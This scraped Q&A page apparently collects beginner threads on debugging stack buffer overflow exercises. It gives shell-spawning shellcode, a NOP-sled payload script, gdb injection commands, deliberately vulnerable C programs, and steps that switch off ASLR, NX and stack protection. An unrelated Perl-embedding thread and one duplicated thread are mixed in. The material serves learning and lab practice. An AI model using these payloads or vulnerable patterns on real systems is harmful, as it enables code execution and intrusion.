I am new to buffer overflow attacks.
I copy the shellcode from http://shell-storm.org/shellcode/files/shellcode-76.php
I wrote a c script to test the shellcode.
It looks like this:
char * shellcode = "\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57 \x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05";
int main(){
void (*f) ()= (void(*)())shellcode;
(*f)();
return 0;
}
It works well. It can generate a shell.
But when I wrote another c script, "tS.c", to test the shellcode, I got a segmentation fault.
My c script looks like:
void hello(){
char s[144];
gets(s);
printf("%s\n", s);
}
int main(){
hello();
return 0;
}
I use a python script, "sc.py", to generate my payload.
And it looks like:
s_storm = "\x48\x31\xD2\x48\xBB\xFF\x2F\x62\x69\x6E\x2F\x73\x68\x48\xC1\xEB\x08\x53\x48\x89\xE7\x48\x31\xC0\x50\x57\x48\x89\xE6\xB0\x3B\x0F\x05\x6A\x01\x5F\x6A\x3C\x58\x0F\x05"
attack = s_storm
size = len(attack)
nops = '\x90'*(144 - size)
retAddr = 0x7fffffffde14
ex = nops + attack + '\x00'*8 + p64(retAddr)
print ex
The payload works in gdb, and it can successfully spawn a shell.
So I have no idea where I did wrong.
I compiled my c script by:
gcc tS.c -o ts -z execstack -fno-stack-protector -no-pie
I also turn off the aslr in Linux.
I have tried different ways to feed the payload to the process:
(python sc.py; cat)| ./ts
./ts <exploit
I am using Ubuntu64 and my Linux version is 5.0.0-37-generic.
Can someone please tell me where I did wrong or give me some advice about what should I read?
Related
I found this C code example to run shellcode, but it cases segmentation fault for me. It doesn't cause segmentation fault on my friend's machine though, so I am wondering if it is a version issue. Is char causing the segmentation fault?
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
In order for your shellcode to properly work, you'll have to compile your program with the -z execstack flag. This disables the NX protection which is enabled by default and prevents pages holding data from being marked as executable. If you don't disable NX the program will segfault because the memory page where your shellcode string is going to be put is not going to be executable, and the process will get killed when trying to execute its content.
I also see an int 0x80 in your shellcode so I assume this is supposed to be an x86 32bit shellcode. Other than that you're missing an int in front of main(), but I guess that's a copy-paste error.
Compile your program with:
gcc -m32 -z execstack prog.c
I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.
Here is my C program
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[500];
if(argc==2)
{
strcpy(buffer, argv[1]); //vulnerable function
}
return 0;
}
This is the shellcode I am using, which corresponds to simple /bin/ls
\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
I inject this shellcode in gdb using following command
run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')
As I step through the application, it generates SIG FAULT on final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains series of NOP, followed by my shell code as shown in the payload.
I have disabled the ASLR
sudo echo 0 > /proc/sys/kernel/randomize_va_space
and also compiled my binary using fno-stack-protector option.
Any idea what's the cause of SIGSEGV ?
I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows
gcc -z execstack
Have you disabled stack smashing protection in GCC (-fno-stack-protector)?
How to turn off gcc compiler optimization to enable buffer overflow
Trying to use perl data structure (partially as a way to support associative array in C), but the following program keep crashing. It compiles fine but will crash on the line with newSVpv(). Not sure why.
#include <EXTERN.h> /* from the Perl distribution */
#include <perl.h> /* from the Perl distribution */
static PerlInterpreter *my_perl; /*** The Perl interpreter ***/
int main(int argc, char **argv, char **env) {
char *proto = "http";
SV* ret = newSVpv("http", 4);
sv_catpvn(ret, "://", 3);
STRLEN len = 1;
char *result = SvPV(ret, len);
printf("result: %p %d\n", result, len);
return 0;
}
The line to compile it is
gcc -g -o interp te1.c `perl -MExtUtils::Embed -e ccopts -e ldopts`
The perl I have is 5.14.2 running on Ubuntu 12.04.4 LTS.
Thanks for any tips!
UPDATE: Added the gdb trace. Thanks for asking.
gdb trace:
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7b235a6 in Perl_newSVpv () from /usr/lib/libperl.so.5.14
(gdb) bt
#0 0x00007ffff7b235a6 in Perl_newSVpv () from /usr/lib/libperl.so.5.14
#1 0x0000000000400927 in main (argc=1, argv=0x7fffffffe1e8,
env=0x7fffffffe1f8) at te1.c:7
(gdb)
I'm usually calling C from Perl, rather than Perl from C, but I'm pretty sure that your problem is that you haven't copied the PERL_SYS_INIT3, perl_alloc, and perl_construct bits from the perlembed example and so you don't actually have a perl interpreter structure to work with. newSVpv is bombing out when it tries to access something through the nonexistent interpreter pointer.
The last three lines of that example (perl_destruct, perl_free, and PERL_SYS_TERM) should also be called at the end of your program as a matter of good practice.
I wrote a simple ASM file and ran it in a C file I'd written. I got a segentation fault. However, when I execute the compiled ASM file, I get no error.
I am running 64 bit and using 32 bit shellcode. Is that the issue?
It can't be, because I'm getting a segmentation fault with this:
char shellcode[] = "\x90"; //simple NOP in ASM
int main(int argc, char **argv)
{
int (*ret)();
ret = (int (*)()) shellcode;
(int)(*ret)();
}
Can someone please run this and tell me whether or not they get a segmentation fault. I have used 3 or 4 other C files as well. None have worked.
Update:
((void(*)(void))code)();
Seems to be working in place of those three lines.
As mentioned above the shellcode is in non-executable memory. Try recompiling the program with the -fno-stack-protector and the -z execstack flags enabled.
That is:
gcc -fno-stack-protector -z execstack -O OutputFileName yourShellCode.c
Two issues:
The shell code might be in non-executable memory. In order to make it executable, you need to either ask the OS to make it executable (e.g. with mprotect(2) or VirtualProtect()), or allocate new executable memory and copy it there (e.g. with mmap(2) or VirtualAlloc().
Your shell code doesn't return/exit. After the CPU executes your NOP there (0x90), it's going to keep on executing code in the memory that comes after that NOP instruction. Most likely, this will crash quickly, but it might do other random, unpredictable things.
To fix #2, you need to explicitly either execute a return instruction (C3 on x86/x86-64) to return from your shell code, or you need to do something which never returns, like call the exit(3) function.
Maybe you should change your variable :
char shellcode[]
To:
const char shellcode[]
Like in this question:
segmentation-fault-error-when-exe-c
This one worked for me! :)
Try put the shellcode in the main function to make it a local variable:
int main(int argc, char **argv)
{
const char shellcode[] = "<your shellcode>";
int (*ret)();
ret = (int (*)()) shellcode;
(int)(*ret)();
}
Then compile it with flags -fno-stack-protector and -z execstack:
gcc <filename>.c -fno-stack-protector -z execstack -o <filename>
I found this idea on stackexchange and it worked for me.
I am trying to learn to exploit simple bufferover flow technique on Backtrack Linux.
Here is my C program
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
char buffer[500];
if(argc==2)
{
strcpy(buffer, argv[1]); //vulnerable function
}
return 0;
}
This is the shellcode I am using, which corresponds to simple /bin/ls
\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
I inject this shellcode in gdb using following command
run $(python -c 'print "\x90" * 331 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x6e\x2f\x6c\x73\x66\x68\x62\x69\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x0c\xd3\xff\xff"*35')
As I step through the application, it generates SIG FAULT on final ret instruction. At that point EIP is correctly set to 0xffffd30c. This address is addressable and contains series of NOP, followed by my shell code as shown in the payload.
I have disabled the ASLR
sudo echo 0 > /proc/sys/kernel/randomize_va_space
and also compiled my binary using fno-stack-protector option.
Any idea what's the cause of SIGSEGV ?
I have answered my own question, the problem was "Executable Stack Protection", where in stack memory cannot be executed. This can be disabled in gcc as follows
gcc -z execstack
Have you disabled stack smashing protection in GCC (-fno-stack-protector)?
How to turn off gcc compiler optimization to enable buffer overflow